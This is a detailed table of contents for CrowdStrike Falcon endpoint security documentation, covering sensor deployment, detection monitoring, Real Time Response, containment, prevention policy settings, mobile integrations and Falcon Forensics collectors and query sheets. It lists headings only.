CrowdStrike

Endpoint Security

Prestataire Informatique RODRIGUEZ

03/29/2026

  1. Endpoint Security
    1. Start Up and Scale Up
      1. About the Falcon platform
        1. What is Falcon?
      2. How does Falcon work?
        1. What detection capabilities does Falcon have?
        2. What is the Falcon sensor?
          1. Does the sensor integrate with SIEM technology?
        3. What operating systems does Falcon support?
        4. What data does Falcon send to the cloud?
        5. How does Falcon safeguard customer data?
      3. Getting Falcon up and running
        1. Before you begin
        2. Download and install the sensor
          1. 1. Download and run the sensor installer
          2. 2. Verify the sensor is running
          3. 3. Scale up
        3. Set up a host group
          1. 1. Create a host group
          2. 2. Put a host in the group
          3. 3. Scale up
        4. Review the default prevention policy
          1. 1. Go to the Default Policy
          2. 2. Scale up
        5. Watch the sensor detect an event
          1. 1. Run a simulated attack
          2. 2. View the detection
          3. 3. Scale up
      4. More info
    2. MITRE-Based Falcon Detections Framework
      1. Overview
      2. About objective, tactic, technique, sub-technique, and description
      3. About the Falcon Detection Methods matrices
        1. Falcon Detection Methods tactics and techniques
      4. ATT&CK Matrix for Enterprise
      5. ATT&CK Matrix for Mobile
    3. Endpoint Monitoring
      1. About Endpoint Monitoring
        1. Overview
        2. Requirements
        3. Understanding the information in Endpoint detections
          1. What’s the relationship between events, detections, and incidents?
        4. Understanding incidents
        5. Understanding detections
          1. MITRE-Based Falcon Detection Framework
      2. Endpoint Detection Monitoring
        1. Overview
        2. Requirements
        3. Understanding endpoint detections
          1. Incident involvement
        4. Working through an endpoint detection
          1. Filter, sort, and group detections
          2. Configure detection attributes
          3. View more details about a detection
          4. Process tree
            1. Process tree examples
          5. Investigate a detection
            1. Detections with cloud-based ML technique
          6. Take action on a detection
          7. Monitor custom IOA detections and preventions
        5. Investigate reconstructed commands
          1. Reconstructed commands on the Detection page
          2. Reconstructed commands in the process table
          3. Reconstructed commands in the process tree
          4. Reconstructed commands in the Process Graph
        6. Endpoint detection management
          1. Detection assignment
          2. Detection status
          3. Detection tags
          4. Edit one or more detections
        7. How detections are recorded
        8. Detection icons
          1. Severity colors
          2. Disposition and attribution icons
        9. Detections accessibility keyboard shortcuts
      3. Mobile Detection Monitoring
        1. Requirements
        2. Working through mobile detections
          1. Viewing mobile detections
          2. Modifying mobile detections
      4. Quarantined Files
        1. Requirements
        2. About quarantined files
        3. View quarantined files
        4. Release a file
        5. Undo a released file
        6. Download a file
        7. Delete a file
        8. File extraction FAQs
      5. Triggered Memory Dumps
        1. Overview
        2. Requirements
        3. About triggered memory dumps
        4. Configure memory dumps
      6. Remediations
        1. Requirements
        2. About remediations
        3. Getting to Remediations
        4. Review the remediation actions performed on a detection
    4. Response
      1. Real Time Response
        1. About Real Time Response
          1. Requirements
          2. Getting started with Real Time Response
          3. Real Time Responder roles
            1. Individual command permissions for custom roles
              1. Running RTR commands
          4. Real Time Response identity verification
            1. About Falcon MFA for RTR
              1. Account configuration
              2. User configuration
            2. Requirements
            3. Limitations
            4. Enable and configure Falcon MFA for RTR
              1. Step 1: Enable Real Time Response identity verification
              2. Step 2: Configure Falcon MFA for RTR settings
            5. User setup
              1. Step 1. Download a TOTP authentication app
              2. Step 2. Set up Falcon MFA on your authentication app
          5. Configuring response policies
            1. Connecting to a host
            2. Default response policy
            3. Real Time Response policy settings
              1. Real Time Response
              2. Custom Scripts
              3. Falcon Scripts
              4. High risk commands
            4. Creating a response policy
            5. Assigning a response policy to host groups
            6. Enabling or disabling an entire response policy
            7. Deleting a response policy
        2. Using Real Time Response
          1. Using the RTR console
            1. Running commands
              1. Tips for running commands
            2. Running scripts
              1. Running scripts from the Run Commands tab
              2. Tips for running custom scripts
              3. Running scripts from the Edit & Run Scripts tab
              4. Reviewing the script output
            3. Ending a connection
          2. Reviewing Real Time Response audit logs
            1. Roles info: Real Time Response audit logs
            2. Viewing audit logs about Real Time Response sessions
              1. View a session’s details
            3. Viewing the "put" files and custom scripts audit log
            4. Viewing Falcon scripts
          3. Managing custom response scripts
            1. Testing a custom script before saving it
            2. Creating a new custom script
              1. Additional notes about creating and running custom scripts
            3. Editing a script
            4. Create/Edit script dialog
              1. Script dialog field descriptions
              2. Using custom scripts with Fusion SOAR workflows
                1. Accepting and producing JSON in your scripts
                2. Generating schemas
                3. Example: Creating a custom script to use with a workflow
              3. Troubleshooting your script
            5. Deleting a custom script
          4. Managing files for the put command
            1. Uploading a new "put" file
            2. Upload file dialog field descriptions
            3. Deleting a "put" file
          5. Real Time Response commands
            1. Real Time Response commands and platforms
            2. Real Time Response commands and default user role permissions
            3. Real Time Response command operating system prerequisites
              1. Additional notes for Windows commands
          6. Additional info: Real Time Response commands
            1. cat
            2. cd
            3. cp
            4. cswindiag
              1. What cswindiag gathers
              2. Retrieving a CSWinDiag file
              3. Sending a downloaded file to Support
            5. encrypt
              1. Decrypting a file encrypted with the encrypt command
                1. Tips:
                2. Reference:
            6. get
              1. Getting a file
            7. kill
            8. map
            9. memdump
            10. mv
            11. netstat
            12. put
            13. put-and-run
            14. reg
              1. Additional info on reg query
              2. Additional info on reg set
              3. Additional info on reg load and reg unload
            15. rm
            16. run
            17. unmap
            18. update
            19. xmemdump
            20. zip
      2. Network Containment
        1. Requirements
        2. Network containment considerations
        3. Containing a host
        4. Configuring your containment policy
        5. Network containment FAQ
      3. File System Containment
        1. Overview
        2. Requirements
        3. Understanding file system containment
        4. Setup
        5. Managing file system containment
          1. Lift file system containment from endpoint detections
          2. Lift file system containment from host management
          3. Lift file system containment for all hosts
      4. Demonstrate File System Containment With a Simulated Ransomware Attack
        1. Overview
        2. Requirements
        3. Understanding file system containment
          1. What does file system containment do?
          2. Example use case: Ransomware over SMB
        4. Setup
          1. Step 1: Enable file system containment in the Falcon console
          2. Step 2: Prepare a host to simulate a victim
          3. Step 3: Prepare a host to simulate an attacker
          4. Step 4: Perform a simulated attack
          5. Step 5: Lift file system containment
        5. Next steps
        6. Searching for file system containment events
    5. Configuration
      1. Detection and Prevention Policies
        1. Prevention policies
          1. Create a prevention policy
          2. Assign host groups to a prevention policy
          3. Assign custom IOAs to a prevention policy
          4. Edit a prevention policy
          5. Duplicate a prevention policy
          6. Disable a prevention policy
          7. Delete a prevention policy
          8. Policy precedence
            1. Change policy precedence
          9. Verify the active policy
          10. Quarantined files
            1. About quarantine
            2. Enable quarantine
        2. Custom settings and configurations
          1. Exclusions
            1. Overview
              1. Requirements
              2. Before you begin
            2. Understand exclusions
              1. Machine learning exclusions
                1. Considerations for machine learning exclusions
                2. Detect/Prevent
                3. Upload files to CrowdStrike
              2. IOA exclusions
                1. Considerations for IOA exclusions
              3. Sensor visibility exclusions
                1. Considerations for sensor visibility exclusions
            3. Plan your exclusions
            4. Manage machine learning exclusions
              1. View machine learning exclusions
              2. Machine learning (file path) exclusions
                1. Create machine learning (file path) exclusions from within a detection
                2. Create machine learning (file path) exclusions from the exclusions tab
                3. Edit machine learning (file path) exclusions
              3. Machine learning (certificate) exclusions
                1. Create machine learning (certificate) exclusions from within a detection
                2. Create machine learning (certificate) exclusions from the exclusions tab
                3. Edit machine learning (certificate) exclusions
                4. Duplicate machine learning (certificate) exclusions
              4. Delete machine learning exclusions
              5. Export machine learning exclusions
            5. Manage IOA exclusions
              1. View IOA exclusions
              2. Create an IOA exclusion
              3. Duplicate an IOA exclusion
              4. Edit an IOA exclusion
              5. Delete an IOA exclusion
              6. Export IOA exclusions
              7. View the IOA exclusions activity log
              8. View the IOA exclusions audit log
              9. IOA exclusion regex examples
            6. Manage sensor visibility exclusions
              1. View sensor visibility exclusions
              2. Create sensor visibility exclusions
              3. Edit sensor visibility exclusions
              4. Delete sensor visibility exclusions
              5. Export sensor visibility exclusions
            7. View exclusions audit logs
          2. Custom IOCs
            1. Overview
              1. Requirements
            2. Understanding custom IOCs
              1. Custom IOCs in multi-CID environments
              2. Actions
                1. Allow action
                2. Block action
              3. Custom IOC retrodetections
              4. Custom IOC audit log
              5. Custom IOC tags
            3. Setup
              1. Safeguards
            4. Manage custom IOCs
              1. View custom IOCs
              2. Add custom IOCs
                1. Add custom IOCs without metadata
                2. Import custom IOCs with metadata
              3. Edit custom IOCs
              4. Delete custom IOCs
              5. Export custom IOCs
              6. View custom IOCs
              7. View the custom IOC audit log
              8. Format guidelines to add custom IOCs
              9. Custom IOC configuration fields
          3. Custom IOA rules
            1. Overview
              1. Requirements
            2. Understand custom IOA rules and rule groups
              1. What are rules and how are they applied?
              2. Implementation overview
              3. Rule versioning
              4. Rule duplication
              5. Safeguards and testing
            3. Manage custom IOA rules
              1. Create a rule group
              2. Add a custom IOA rule
                1. Rule dialog basic information fields
                2. Rule dialog regex fields
                3. Supported regex syntax
                4. Example custom IOA rule field parameters
              3. Enable or disable a rule or rule group
              4. Edit a rule
              5. Duplicate a rule
              6. Delete a rule or rule group
            4. Assign a rule group to a prevention policy
              1. Prevention policy Assigned Custom IOAs tab
              2. Custom IOA rule group Prevention Policies tab
            5. View the custom IOA audit log
      2. Prevention Policy Settings
        1. Overview
        2. Recommended prevention policy settings
          1. Windows prevention policy setting recommendations
          2. Mac prevention policy setting recommendations
          3. Linux prevention policy recommendation settings
          4. Machine Learning levels
        3. Sensor Capabilities
          1. End User Notifications
          2. Unknown Executable Analysis and Unknown Detection-Related Executable Analysis
          3. Sensor Tamper Prevention
          4. Suspicious File QuickScan Pro Analysis
        4. Enhanced Visibility category
          1. Additional User Mode Data Visibility
          2. D-Bus Visibility
          3. Email Protocol Visibility
          4. Extended Command Line Visibility
            1. Extended Command Line Visibility requirements
              1. Supported shell types and operators
            2. How Extended Command Line Visibility works
            3. Memory impact and policy configuration
            4. Enable Extended Command Line Visibility
            5. Extended Command Line Visibility limitations
              1. Operator limitations
              2. Built-in command and binary execution failures
              3. Built-in command limitations
              4. Dash shell limitations
              5. tty redirection limitations
              6. Command line and file name length limitations
              7. Network redirect command limitations
            6. Behavior with Sensor Visibility Exclusion (SVE) configured
              1. Scenario 1
              2. Scenario 2
              3. Scenario 3
            7. Shell-specific command reconstruction examples
              1. Bash shell reconstruction
              2. Dash shell reconstruction
              3. Tcsh shell reconstruction
          5. Enhanced DLL Load Visibility
          6. Enhanced Exploitation Visibility
            1. Performance considerations
          7. Enhanced Network Visibility
            1. Supported protocols
            2. Related Falcon Next-Gen SIEM events
            3. Example: Hunting for application tunnelling
          8. Enhance PHP Visibility
          9. Enhance Systemd Visibility
          10. PHP Script Optimization
          11. Extended User Mode Data Visibility
          12. Environment Variable Visibility
          13. Filesystem Visibility
            1. Monitored Filesystem Event Types
            2. Network file systems
            3. Excluded file systems
          14. FTP Visibility
          15. Hardware-Enhanced Exploit Detection
          16. HTTP Visibility
          17. HTTP Visibility and Detection
          18. Interpreter-Only Visibility
          19. Memory Visibility
          20. Network Visibility
            1. Network events supported on Linux
          21. Redacted HTTP Detection Details
          22. Script-Based Execution Visibility
          23. SSH Visibility
          24. System Management Engine Visibility
          25. TLS Visibility
          26. WSL 2 Visibility
        5. Hardware-Enhanced Visibility category
          1. Memory Scanning with GPU
            1. Identify supported endpoints
            2. System performance safeguards
          2. Memory Scanning with CPU
            1. Identify supported endpoints
            2. System performance safeguards
        6. Firmware category
          1. BIOS Firmware Deep Visibility
        7. Cloud Machine Learning category
          1. Cloud-Based Anti-Malware
          2. Cloud Anti-malware for Microsoft Office Files
          3. Microsoft Office File Malicious Macro Removal
          4. Cloud-Based Adware & PUP
        8. Sensor Machine Learning category
          1. Sensor-Based Anti-Malware
            1. Enhanced machine learning for larger files
            2. Sensor Adware & PUP
        9. On Write category
          1. Recommended best practices
          2. Detect on Write
          3. On Write Script File Visibility
          4. Quarantine on Write
        10. Quarantine category
          1. Quarantine & Security Center Registration
          2. Quarantine
          3. Quarantine on Removable Media
        11. On-Demand Scans category
          1. On-Demand Scans Machine Learning
            1. Sensor-based anti-malware on-demand scanning
            2. Cloud-based anti-malware on-demand scanning
            3. Cloud-based adware & PUP on-demand scanning
          2. On-Demand Scans
            1. USB Insertion Triggered Scan
        12. Execution Blocking category
          1. Custom Indicator Blocking
          2. Suspicious Process Prevention
          3. Suspicious Script and Command Prevention
          4. Suspicious Registry Operation Prevention
          5. Container Drift Prevention
          6. Intelligence-Sourced Threat Prevention
          7. Driver Load Prevention
          8. Vulnerable Driver Protection
          9. File System Containment
          10. Boot Configuration Database Protection
        13. Exploit Mitigation category
          1. ASLR Bypass Prevention
          2. DEP Bypass Prevention
          3. Heap Spray Pre-allocation Prevention
          4. NULL Page Allocation Prevention
          5. SEH Overwrite Prevention
        14. Unauthorized Remote Access IOAs category
          1. Chopper Webshell Prevention
          2. XPCOM Shell Prevention
          3. Empyre Backdoor Prevention
        15. Credential Dumping IOAs category
          1. KcPassword Decoded Prevention
          2. Hash Collector Prevention
        16. Ransomware category
          1. Backup Deletion Prevention
          2. Cryptowall Prevention
          3. File Encryption Prevention
          4. Locky Prevention
          5. File System Access Prevention
          6. Volume Shadow Copy - Audit
          7. Volume Shadow Copy - Protect
        17. Exploitation Behavior category
          1. Application Exploitation Prevention
          2. Chopper Webshell Prevention
          3. Drive-by Download Prevention
          4. Code Injection Prevention
          5. JavaScript Execution Via Rundll32 Prevention
        18. Lateral Movement and Credential Access category
          1. Windows Logon Bypass ("Sticky Keys") Prevention
          2. Credential Dumping Prevention
        19. Remediation category
          1. Advanced Remediation
        20. Cloud-based detections category
          1. Cloud-based anomalous process execution
        21. Three-phase prevention policy settings
          1. Phase 1: Initial deployment
          2. Phase 2: Interim protection
          3. Phase 3: Optimal protection
          4. Windows prevention policy setting recommendations - three-phase view
          5. Mac prevention policy setting recommendations - three-phase view
          6. Linux prevention policy recommendations - three-phase view
      3. Configuring Falcon for Mobile
        1. Overview
          1. Requirements
          2. Integrating with an MDM for remediation actions
          3. Using multi-factor authentication with FalconID
          4. Network protection
            1. Android profiles
        2. Mobile policy sensor settings
          1. Recommended mobile policy settings
          2. Access to sensitive data types
            1. Uploading Android APKs for analysis
            2. Detecting suspicious Android apps
          3. Automatic network containment
          4. Network preventions
            1. Prevention considerations
          5. Protecting network activity on Android devices
            1. Using the Falcon for Mobile VPN
              1. Multi-VPN support
              2. VPN bypass
              3. Enabling the VPN on Android devices
                1. Enable the VPN through the notification
                2. Enable the VPN through the Falcon app
            2. Using the Falcon for Mobile proxy
              1. Proxy considerations
              2. Configuring the proxy in your MDM
          6. End-user notifications
          7. Device integrity for Android devices
          8. Application log collection
        3. Managing mobile policies
          1. Mobile policies in multi-CID environments
          2. Policy precedence
          3. Create a mobile policy
          4. Delete a policy
          5. Edit mobile policy precedence
          6. Configure sensor settings
          7. Assign or remove host groups
          8. Configure end-user notifications
        4. Managing custom IOCs for mobile devices
          1. Considerations with mobile IOCs
          2. Mobile IOC limits
          3. Add mobile IOCs
        5. Forensics analysis for mobile devices
          1. Perform analysis on iOS devices
          2. Perform analysis on Android devices
        6. Managing mobile hosts
          1. Viewing mobile host details
          2. Zero Trust Assessment for mobile hosts
          3. Network containment for mobile hosts
          4. Deleting a mobile host
        7. Viewing mobile detections and events
          1. Detections
          2. Events
        8. Excluding mobile detections
          1. Mobile detection exclusions in multi-CID environments
          2. Considerations for mobile detection exclusions
          3. Create mobile detection exclusions
          4. Delete mobile detection exclusions
        9. Viewing mobile dashboards
        10. Mobile device trust with Falcon Identity Protection
          1. How mobile device trust works
        11. Configuring Falcon Fusion SOAR workflows for Falcon for Mobile
          1. Create a workflow
        12. Collecting application logs for troubleshooting
          1. Enable or disable remote log collection
          2. Manually share application logs from mobile devices
      4. Integrating Falcon for Mobile with Microsoft Intune for Remediation Actions
        1. Overview
          1. Integration data flow
          2. Requirements
          3. Before you begin
          4. Configuration overview
        2. Set up Intune
          1. Configure the Mobile Threat Defense connector
          2. Understanding compliance policies
          3. Create a compliance policy
          4. Configure the MDM device ID
            1. Configure the MDM device ID for Android devices
              1. Configure the MDM device ID for zero-touch enrollment
              2. Configure the MDM device ID for manual enrollment
            2. Configure the MDM device ID for iOS devices
              1. Configure the MDM device ID for a Content Filter profile
              2. Configure the MDM device ID for a Per-App VPN profile
        3. Connect Falcon to Intune
        4. Configure remediation triggers in Falcon
          1. Remediation trigger considerations
          2. Severity mapping for remediation triggers
          3. Configure remediation triggers
        5. View non-compliant devices in Intune
        6. View detections in the Falcon console
        7. Manage the Intune integration
          1. View the connector status or modify connector settings in Intune
          2. Disable the integration
          3. Delete the integration
      5. Integrating Falcon for Mobile with Omnissa Workspace ONE for Remediation Actions
        1. Overview
          1. Integration data flow
          2. Requirements
          3. Before you begin
            1. Deploying Falcon for Mobile
            2. Selecting the Workspace ONE organization group
          4. Configuration overview
        2. Step 1: Connect Falcon to Workspace ONE
          1. Step 1a: Configure the device UID in Workspace ONE
            1. Configure the device UID for Android devices
            2. Configure the device UID for iOS devices
          2. Step 1b: Configure authentication settings in Workspace ONE
            1. Configure OAuth in Workspace ONE
            2. Configure the API key in Workspace ONE
          3. Step 1c: Configure the integration in the Falcon console
            1. Connect Falcon to Workspace ONE
        3. Step 2: Configure remediation triggers in Falcon
          1. Remediation trigger considerations
          2. Configure remediation triggers
        4. Step 3: Configure remediation actions in Workspace ONE
          1. How Workspace ONE uses tags to identify devices
            1. Severity tag aggregation
            2. Deleting tags from Workspace ONE
            3. Viewing tags
          2. Using compliance policies
            1. Using tags in compliance policy rules
            2. Create a compliance policy
        5. Manage the Workspace ONE integration
          1. Edit Workspace ONE credentials
          2. Edit the Workspace ONE organization group in Falcon
          3. Disable or delete the integration
        6. View non-compliant devices in Workspace ONE
        7. View detections in the Falcon console
        8. Use case: Restricting Android app access on devices without a lock screen
          1. Step 1: Configure the remediation trigger in Falcon
          2. Step 2: Create an Android profile with app restrictions
          3. Step 3: Create a compliance policy
    6. Falcon Forensics
      1. Falcon Forensics for Windows, Mac, and Linux
        1. Overview
        2. Requirements
        3. Understand Falcon Forensics
          1. How the Falcon Forensics executable works
        4. Work with collections and configurations
          1. Create a collection
          2. Create a configuration
          3. Manage configurations
            1. View status of collections
        5. Use data from offline or legacy collections
          1. Run an offline collection on an air-gapped device
          2. Run a legacy collection on an unsupported device
          3. Run an offline collection with a custom configuration
          4. Submit collections to the CrowdStrike cloud
        6. Falcon Forensics delivered through Falcon Data Replicator
        7. Work with the Unix-like Artifacts Collector (UAC)
          1. Set up the UAC binary
          2. Gather a collection using the UAC
        8. Send data to a parent from a child CID
        9. Collected forensics data: Default template
          1. Windows
          2. Mac and Linux
        10. Artifacts supported by Falcon Forensics for the UAC collector
          1. ContextTimestamps field descriptions
            1. Windows
            2. Mac and Linux
        11. Plan to deploy Falcon Forensics
          1. Use managed deployment to deploy Falcon Forensics
          2. Ensure host machines can reach CrowdStrike
          3. Proxy support
            1. Command line arguments
          4. Create Fusion SOAR workflows
          5. Gather a list of host machines to run Falcon Forensics
        12. Deploy Falcon Forensics to hosts
          1. Run Falcon Forensics Collector with RTR
          2. Run Falcon Forensics with Runscript
          3. Ensure that Falcon Forensics is running
        13. Forensics dashboards
          1. View deployment status
          2. View File event log
          3. View Host event info
          4. View Host timeline
          5. View Windows hunting leads
          6. View the browser hunting dashboard
        14. Forensics event search
        15. Forensics advanced event search
        16. Exit codes
        17. Forensics data field definitions
          1. Artifacts collected by Falcon Forensics
          2. Event log source
          3. regdump
          4. regdump registry entries
          5. regfile
          6. regfile registry entries
          7. Artifacts
          8. Windows Management Instrumentation (WMI) query
        18. Run collectors on network-contained hosts
        19. Understand generated spreadsheets
          1. FalconDeploy_{FileDateTime}.csv
          2. FalconQueue_{FileDateTime}.csv
          3. FFC_Reg_Values.csv
      2. Falcon Forensics Collectors
        1. Overview
        2. Windows collectors
          1. About file operations
            1. Important considerations
          2. ADS
            1. Events generated
            2. Configurable options
          3. Amcache
            1. Events generated
            2. Configurable options
          4. BAM
            1. Events generated
            2. Configurable options
          5. BITS
            1. Events generated
            2. Configurable options
          6. Browser
            1. Events generated
            2. Configurable options
          7. DataStore
            1. Events generated
            2. Configurable options
          8. Defender
            1. Events generated
            2. Configurable options
          9. DefenderWMI
            1. Events generated
            2. Configurable options
          10. DirList
            1. Events generated
            2. Configurable options
          11. Drives
            1. Events generated
            2. Configurable options
          12. Drivers
            1. Events generated
            2. Configurable options
          13. Env
            1. Events generated
            2. Configurable options
          14. Events
            1. Events generated
            2. Configurable options
            3. Default configuration collection examples
              1. Antivirus events
              2. Remote Desktop Protocol (RDP) events
              3. Task scheduler events
              4. PowerShell events
          15. FeatureUsage
            1. Events generated
            2. Configurable options
          16. Files
            1. Events generated
            2. Configurable options
          17. Firewall
            1. Events generated
            2. Configurable options
          18. Groups
            1. Events generated
            2. Configurable options
          19. Handles
            1. Events generated
            2. Configurable options
          20. Jobs
            1. Events generated
            2. Configurable options
          21. JumpList
            1. Events generated
            2. Configurable options
          22. Link
            1. Events generated
            2. Configurable options
          23. LogFile
            1. Events generated
            2. Configurable options
            3. Default configuration examples
              1. ZeroLogon detection
              2. Windows defender detection logs
              3. PowerShell history
          24. Magic
            1. Events generated
            2. Configurable options
          25. Mal
            1. Events generated
            2. Configurable options
          26. MFT
            1. Events generated
            2. Configurable options
          27. Network
            1. Events generated
            2. Configurable options
          28. PCA
            1. Events generated
            2. Configurable options
          29. PEInfo
            1. Events generated
            2. Configurable options
          30. Pipes
            1. Events generated
            2. Configurable options
          31. Prefetch
            1. Events generated
            2. Configurable options
          32. PSList
            1. Events generated
            2. Configurable options
          33. RecentFiles
            1. Events generated
            2. Configurable options
          34. Recycle
            1. Events generated
            2. Configurable options
          35. RegDump
            1. Events generated
            2. Configurable options
            3. Default configuration examples
              1. HKLM registry keys
              2. HKAU registry keys - Microsoft related
              3. HKAU registry keys - Browser related
              4. HKAU registry keys - File management tools
              5. HKAU registry keys - System management
              6. HKAU registry keys - Shell extensions
          36. RegFile
            1. Events generated
            2. Configurable options
            3. Default configuration examples
              1. HKLM registry keys
              2. HKAU registry keys
          37. SDB
            1. Events generated
            2. Configurable options
          38. Services
            1. Events generated
            2. Configurable options
          39. Shares
            1. Events generated
            2. Configurable options
          40. ShellBag
            1. Events generated
            2. Configurable options
          41. Shim
            1. Events generated
            2. Configurable options
          42. SRUM
            1. Events generated
            2. Configurable options
          43. StartupInfo
            1. Events generated
            2. Configurable options
          44. SuperFetch
            1. Events generated
            2. Configurable options
          45. Syscache
            1. Events generated
            2. Configurable options
          46. Tasks
            1. Events generated
            2. Configurable options
          47. Timeline
            1. Events generated
            2. Configurable options
          48. UAL
            1. Events generated
            2. Configurable options
          49. USB
            1. Events generated
            2. Configurable options
          50. UserAssist
            1. Events generated
            2. Configurable options
          51. Users
            1. Events generated
            2. Configurable options
          52. USN
            1. Events generated
            2. Configurable options
            3. USN reason bit mask values
          53. VSS
            1. Events generated
            2. Configurable options
          54. Weblog
            1. Events generated
            2. Configurable options
          55. WebShell
            1. Events generated
            2. Configurable options
          56. WMI
            1. Events generated
            2. Configurable options
            3. Default configuration examples
              1. Event subscription queries
              2. Security center queries
              3. Software monitoring queries
          57. WLAN
            1. Events generated
            2. Configurable options
          58. YARA
            1. Events generated
            2. Configurable options
            3. Yara rules configuration
            4. Target path configuration
            5. File operations and limits
            6. Scan options
          59. ZIP
            1. Events generated
            2. Configurable options
        3. Mac collectors
          1. AppleSystemLog
            1. Events generated
            2. Configurable options
          2. AppleUnifiedLog
            1. Events generated
            2. Configurable options
            3. Predefined predicates reference
          3. Applications
            1. Events generated
            2. Configurable options
          4. Audit
            1. Events generated
            2. Configurable options
          5. Auto Runs
            1. Events generated
            2. Configurable options
          6. Browser: Chrome
            1. Events generated
            2. Configurable options
          7. Browser: Firefox
            1. Events generated
            2. Configurable options
          8. Browser: Safari
            1. Events generated
            2. Configurable options
          9. Entropy
            1. Events generated
            2. Configurable options
          10. Env Vars
            1. Events generated
            2. Configurable options
          11. Event Taps
            1. Events generated
            2. Configurable options
          12. FileSystem
            1. Events generated
            2. Configurable options
          13. FS Events
            1. Events generated
            2. Configurable options
          14. IP Addresses
            1. Events generated
            2. Configurable options
          15. IP Connections
            1. Events generated
            2. Configurable options
          16. IP Routes
            1. Events generated
            2. Configurable options
          17. Kernel Modules
            1. Events generated
            2. Configurable options
          18. Kernel Params
            1. Events generated
            2. Configurable options
          19. Knowledge
            1. Events generated
            2. Configurable options
          20. Line
            1. Events generated
            2. Configurable options
            3. Default configuration examples
              1. SSH configuration files
              2. Shell configuration files
              3. System authentication files
              4. Scheduled tasks
          21. MacMRU
            1. Events generated
            2. Configurable options
          22. MacSpotlight
            1. Events generated
            2. Configurable options
          23. NetUsage
            1. Events generated
            2. Configurable options
          24. Processes
            1. Events generated
            2. Configurable options
          25. Quarantines
            1. Events generated
            2. Configurable options
          26. System Extensions
            1. Events generated
            2. Configurable options
          27. SystemLog
            1. Events generated
            2. Configurable options
          28. Terminal Saved State
            1. Events generated
            2. Configurable options
          29. Users
            1. Events generated
            2. Configurable options
          30. UTmpLog
            1. Events generated
            2. Configurable options
          31. Volumes
            1. Events generated
            2. Configurable options
          32. YARA
            1. Events generated
            2. Configurable options
          33. ZSH Sessions
            1. Events generated
            2. Configurable options
        4. Linux collectors
          1. Applications
            1. Events generated
            2. Configurable options
          2. Audit
            1. Events generated
            2. Configurable options
          3. Browser: Chrome
            1. Events generated
            2. Configurable options
          4. Browser: Firefox
            1. Events generated
            2. Configurable options
          5. Entropy
            1. Events generated
            2. Configurable options
          6. Env Vars
            1. Events generated
            2. Configurable options
          7. FileSystem
            1. Events generated
            2. Configurable options
          8. FirewallRules
            1. Events generated
            2. Configurable options
          9. IP Addresses
            1. Events generated
            2. Configurable options
          10. IP Connections
            1. Events generated
            2. Configurable options
          11. IP Routes
            1. Events generated
            2. Configurable options
          12. Kernel Modules
            1. Events generated
            2. Configurable options
          13. Kernel Params
            1. Events generated
            2. Configurable options
          14. Line
            1. Events generated
            2. Configurable options
            3. Default configuration examples
              1. Shell history files
              2. SSH configuration files
              3. Scheduled tasks
              4. System configuration files
              5. System startup files
              6. User configuration files
              7. System authentication files
          15. Processes
            1. Events generated
            2. Configurable options
          16. SystemLog
            1. Events generated
            2. Configurable options
            3. Default configuration examples
              1. Authentication logs
              2. System logs
              3. Kernel and boot logs
              4. Application logs
          17. Users
            1. Events generated
            2. Configurable options
          18. UTmpLog
            1. Events generated
            2. Configurable options
            3. Default configuration examples
              1. Login records
          19. Volumes
            1. Events generated
            2. Configurable options
          20. YARA
            1. Events generated
            2. Configurable options
      3. Falcon Forensics Query Sheet for Windows
        1. Tips for searches
        2. System
          1. ForensicsCollectorOnline
          2. ForensicsCollectorOffline
          3. ForensicsCollectorLog
          4. OsVersionInfo
        3. Amcache
        4. BAM
        5. Browser
        6. DataStore
        7. Defender
        8. Dirlist
        9. Drives
        10. Drivers
        11. Env
        12. Events
        13. Firewall
        14. Files
        15. Groups
        16. Handles
        17. Jobs
        18. Jumplist
        19. Link
        20. Magic
        21. Mal
        22. MFT
        23. Network
          1. IPv4
          2. IPv6
          3. DNS
          4. ARP
          5. UDP
          6. Hosts File
        24. PCA
        25. PEInfo
        26. Pipes
        27. Prefetch
        28. PSList
        29. Recentfiles
        30. RecentExecutionTimestamp
        31. Recycle
        32. Regdump
        33. RegFeatureUsageInfo
        34. Regfile
        35. SDB
        36. Services
        37. Shares
        38. Shellbag
        39. Shim
        40. StartupInfo
        41. SRUM
        42. Superfetch
        43. SysCache
        44. Tasks
        45. Timeline
        46. UAL
        47. UserAssist
        48. USB
        49. USNJournal
        50. Users
        51. Webshell
        52. WMI
        53. WlanInterfaceInfo
        54. Yara
        55. ZIP
      4. Falcon Forensics Query Sheet for Mac
        1. Tips for searches
        2. System
          1. ForensicsCollectorOnline
          2. ForensicsCollectorOffline
          3. ForensicsCollectorLog
        3. AutorunProcessInfo
        4. BrowserAccount
        5. BrowserCookie
        6. BrowserDownloadStarted
        7. BrowserDownloadEnd
        8. BrowserExtensionInfo
        9. BrowserHistoryVisit
        10. BrowserHistoryClearInfo
        11. BrowserProxy
        12. Entropy
        13. EnvVars
        14. EventTapInfo
        15. FileEntry
        16. FileTimestampMetadata
        17. FileInfo
        18. FsVolumeMounted
        19. GroupAccount
        20. InstalledApplication
        21. KernelExtension
        22. LocalIpAddressIp4
        23. LocalIpAddressIp6
        24. LogEntry
        25. MacMRU
        26. MacFsEventRecord
        27. MacKnowledge
          1. Show all Fields
          2. Condensed Fields
          3. Search by value
        28. NetworkCloseIP4
        29. NetworkCloseIP6
        30. NetworkConnectIP4
        31. NetworkConnectIP6
        32. NetworkEndPointDataUsage
        33. NetworkListenIP4
        34. NetworkListenIP6
        35. NetworkReceiveAcceptIP4
        36. NetworkReceiveAcceptIP6
        37. OsVersionInfo
        38. ProcessDataUsage
        39. ProcessRollup2
        40. Quarantine
          1. LSQuarantineEvent
          2. QuarantineXattribute
        41. RouteIP4
        42. RouteIP6
        43. SignInfo
        44. SpotlightSearchEntry
        45. SystemExtension
        46. TerminalSavedStateInfo
        47. UserAccount
        48. YARA
      5. Falcon Forensics Query Sheet for Linux
        1. Tips for searches
        2. System
          1. ForensicsCollectorOnline
          2. ForensicsCollectorOffline
          3. ForensicsCollectorLog
        3. BrowserAccount
        4. BrowserCookie
        5. BrowserDownloadStart
        6. BrowserDownloadEnd
        7. BrowserExtensionInfo
        8. BrowserHistoryVisit
        9. BrowserHistoryClearInfo
        10. BrowserProxy
        11. CreateSocket
        12. Entropy
        13. EnvVars
        14. FileEntry
        15. FirewallRules
          1. FirewallRuleIP4
          2. FirewallRuleIP6
        16. FileDescriptorMonitor
        17. FileInfo
        18. FileTimestampMetadata
        19. FsVolumeMounted
        20. GroupAccount
        21. InstalledApplication
        22. KernelModeLoadImage
        23. LocalIpAddressIp4
        24. LocalIpAddressIp6
        25. LogEntry
        26. NetworkCloseIP4
        27. NetworkCloseIP6
        28. NetworkConnectIP4
